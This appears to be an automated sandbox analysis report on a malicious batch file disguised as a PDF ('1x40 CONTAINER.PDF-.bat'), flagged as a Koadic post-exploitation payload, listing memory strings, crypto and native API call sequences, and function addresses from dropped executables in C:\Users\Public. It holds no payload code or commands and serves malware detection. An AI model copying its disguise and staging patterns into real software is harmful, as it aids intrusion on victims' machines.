Source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: kn.exe | String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
Source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr | String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: kn.exe | String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
Source: kn.exe | String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
Source: kn.exe | String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
Source: kn.exe | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
Source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: kn.exe | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token

E-Banking Fraud

Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2960BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore,7_2_00007FF6AA2960BC
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2429A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF6AA2429A0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA26EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF6AA26EA7C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA270F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF6AA270F58
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2B6EA8 NCryptImportKey,#360,7_2_00007FF6AA2B6EA8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA280EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF6AA280EF4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA27E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF6AA27E1F8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2BA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6AA2BA740
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2425E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF6AA2425E8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA21FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF6AA21FC20
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA20F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF6AA20F9B8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2B93A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6AA2B93A0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA28342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6AA28342C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA27184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF6AA27184C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2B98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6AA2B98B0

System Summary

Source: 1x40 CONTAINER.PDF-.bat, type: SAMPLE | Matched rule: Koadic post-exploitation framework BAT payload | Author: ditekSHen
Source: 1x40 CONTAINER.PDF-.bat | Static file information: 3675586
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD483D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,4_2_00007FF7CD483D94
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD49898C NtQueryInformationToken,4_2_00007FF7CD49898C
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4B1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_00007FF7CD4B1538
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4989E4 NtQueryInformationToken,NtQueryInformationToken,4_2_00007FF7CD4989E4
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4ABCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00007FF7CD4ABCF0
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD498114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00007FF7CD498114
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD4988C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_00007FF7CD4988C0
Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF7CD497FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,4_2_00007FF7CD497FF8
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD483D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,6_2_00007FF7CD483D94
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD49898C NtQueryInformationToken,6_2_00007FF7CD49898C
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD4B1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,6_2_00007FF7CD4B1538
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD4989E4 NtQueryInformationToken,NtQueryInformationToken,6_2_00007FF7CD4989E4
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD4ABCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,6_2_00007FF7CD4ABCF0
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD498114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,6_2_00007FF7CD498114
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD4988C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,6_2_00007FF7CD4988C0
Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF7CD497FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,6_2_00007FF7CD497FF8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6AA2DC964 NtQuerySystemTime,RtlTimeToSecondsSince1970,7_2_00007FF6AA2DC964
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD498114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,10_2_00007FF7CD498114
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD497FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,10_2_00007FF7CD497FF8
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD483D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,10_2_00007FF7CD483D94
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD49898C NtQueryInformationToken,10_2_00007FF7CD49898C
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD4B1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,10_2_00007FF7CD4B1538
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD4989E4 NtQueryInformationToken,NtQueryInformationToken,10_2_00007FF7CD4989E4
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF7CD4ABCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,10_2_00007FF7CD4ABCF0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4988C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,10_2_00007FF7CD4988C0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD483D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF7CD483D94
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD49898C NtQueryInformationToken,11_2_00007FF7CD49898C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4B1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF7CD4B1538
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4989E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF7CD4989E4
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4ABCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF7CD4ABCF0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD498114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF7CD498114
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4988C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF7CD4988C0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD497FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF7CD497FF8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD485240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,4_2_00007FF7CD485240
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD494224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,4_2_00007FF7CD494224
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD490A6C4_2_00007FF7CD490A6C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4942244_2_00007FF7CD494224
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD48AA544_2_00007FF7CD48AA54
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4955544_2_00007FF7CD495554
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4937D84_2_00007FF7CD4937D8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4AEE884_2_00007FF7CD4AEE88
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD48E6804_2_00007FF7CD48E680
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4AAA304_2_00007FF7CD4AAA30
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD484A304_2_00007FF7CD484A30
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4822204_2_00007FF7CD482220
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD48D2504_2_00007FF7CD48D250
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD489E504_2_00007FF7CD489E50
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4876504_2_00007FF7CD487650
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4852404_2_00007FF7CD485240
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD486EE44_2_00007FF7CD486EE4
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4A7F004_2_00007FF7CD4A7F00
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD487D304_2_00007FF7CD487D30
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4B15384_2_00007FF7CD4B1538
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD48CE104_2_00007FF7CD48CE10
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD488DF84_2_00007FF7CD488DF8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4AD9D04_2_00007FF7CD4AD9D0
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4881D44_2_00007FF7CD4881D4
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4818844_2_00007FF7CD481884
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4978544_2_00007FF7CD497854
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD482C484_2_00007FF7CD482C48
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4AAC4C4_2_00007FF7CD4AAC4C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD48B0D84_2_00007FF7CD48B0D8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4885104_2_00007FF7CD488510
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4918D44_2_00007FF7CD4918D4
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD485B704_2_00007FF7CD485B70
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD483F904_2_00007FF7CD483F90
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD48372C4_2_00007FF7CD48372C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD489B504_2_00007FF7CD489B50
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD486BE04_2_00007FF7CD486BE0
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4834104_2_00007FF7CD483410
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4AAFBC4_2_00007FF7CD4AAFBC
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD490A6C6_2_00007FF7CD490A6C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4942246_2_00007FF7CD494224
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD48AA546_2_00007FF7CD48AA54
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4955546_2_00007FF7CD495554
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4937D86_2_00007FF7CD4937D8
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4AEE886_2_00007FF7CD4AEE88
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD48E6806_2_00007FF7CD48E680
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4AAA306_2_00007FF7CD4AAA30
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD484A306_2_00007FF7CD484A30
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4822206_2_00007FF7CD482220
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD48D2506_2_00007FF7CD48D250
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD489E506_2_00007FF7CD489E50
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4876506_2_00007FF7CD487650
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4852406_2_00007FF7CD485240
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD486EE46_2_00007FF7CD486EE4
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4A7F006_2_00007FF7CD4A7F00
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD487D306_2_00007FF7CD487D30
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4B15386_2_00007FF7CD4B1538
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD48CE106_2_00007FF7CD48CE10
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD488DF86_2_00007FF7CD488DF8
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4AD9D06_2_00007FF7CD4AD9D0
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4881D46_2_00007FF7CD4881D4
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4818846_2_00007FF7CD481884
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4978546_2_00007FF7CD497854
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD482C486_2_00007FF7CD482C48
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4AAC4C6_2_00007FF7CD4AAC4C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD48B0D86_2_00007FF7CD48B0D8
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4885106_2_00007FF7CD488510
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4918D46_2_00007FF7CD4918D4
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD485B706_2_00007FF7CD485B70
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD483F906_2_00007FF7CD483F90
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD48372C6_2_00007FF7CD48372C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD489B506_2_00007FF7CD489B50
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD486BE06_2_00007FF7CD486BE0
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4834106_2_00007FF7CD483410
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4AAFBC6_2_00007FF7CD4AAFBC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2CCCB87_2_00007FF6AA2CCCB8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F2F387_2_00007FF6AA1F2F38
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2CF0207_2_00007FF6AA2CF020
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2CBC107_2_00007FF6AA2CBC10
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2CC1207_2_00007FF6AA2CC120
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2F38007_2_00007FF6AA2F3800
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA204B687_2_00007FF6AA204B68
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA296B947_2_00007FF6AA296B94
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA258BD47_2_00007FF6AA258BD4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA230C287_2_00007FF6AA230C28
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA22CBFC7_2_00007FF6AA22CBFC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1EAC087_2_00007FF6AA1EAC08
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B8C587_2_00007FF6AA2B8C58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA27CCA87_2_00007FF6AA27CCA8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2ECC8C7_2_00007FF6AA2ECC8C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25CC807_2_00007FF6AA25CC80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D8CF47_2_00007FF6AA2D8CF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA238D2C7_2_00007FF6AA238D2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA242D187_2_00007FF6AA242D18
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F8D007_2_00007FF6AA1F8D00
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23CD107_2_00007FF6AA23CD10
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA272CF87_2_00007FF6AA272CF8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E29407_2_00007FF6AA1E2940
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2389907_2_00007FF6AA238990
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2469847_2_00007FF6AA246984
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2BA9F07_2_00007FF6AA2BA9F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2409EC7_2_00007FF6AA2409EC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA24E9F07_2_00007FF6AA24E9F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26AA007_2_00007FF6AA26AA00
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2CAA587_2_00007FF6AA2CAA58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2D4A587_2_00007FF6AA2D4A58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2B4A407_2_00007FF6AA2B4A40
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26EA7C7_2_00007FF6AA26EA7C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA266A847_2_00007FF6AA266A84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA234B307_2_00007FF6AA234B30
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA284F947_2_00007FF6AA284F94
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA214F907_2_00007FF6AA214F90
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E10307_2_00007FF6AA1E1030
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1FB09C7_2_00007FF6AA1FB09C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA23D0947_2_00007FF6AA23D094
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA22107C7_2_00007FF6AA22107C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A511C7_2_00007FF6AA2A511C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C2D6C7_2_00007FF6AA2C2D6C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA20EDA47_2_00007FF6AA20EDA4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA256D7C7_2_00007FF6AA256D7C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C4E587_2_00007FF6AA2C4E58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C8EAC7_2_00007FF6AA2C8EAC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1E6EF47_2_00007FF6AA1E6EF4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA21EED47_2_00007FF6AA21EED4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA208F1C7_2_00007FF6AA208F1C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2763747_2_00007FF6AA276374
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C234C7_2_00007FF6AA2C234C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2403987_2_00007FF6AA240398
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA22E3A07_2_00007FF6AA22E3A0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2743D07_2_00007FF6AA2743D0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1EA4247_2_00007FF6AA1EA424
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2CE4307_2_00007FF6AA2CE430
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2F842F7_2_00007FF6AA2F842F
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2684147_2_00007FF6AA268414
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2044107_2_00007FF6AA204410
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25A4507_2_00007FF6AA25A450
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25C4507_2_00007FF6AA25C450
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2264A87_2_00007FF6AA2264A8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C04907_2_00007FF6AA2C0490
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2784887_2_00007FF6AA278488
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2384847_2_00007FF6AA238484
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA1F44E07_2_00007FF6AA1F44E0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26E4F07_2_00007FF6AA26E4F0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C84D87_2_00007FF6AA2C84D8
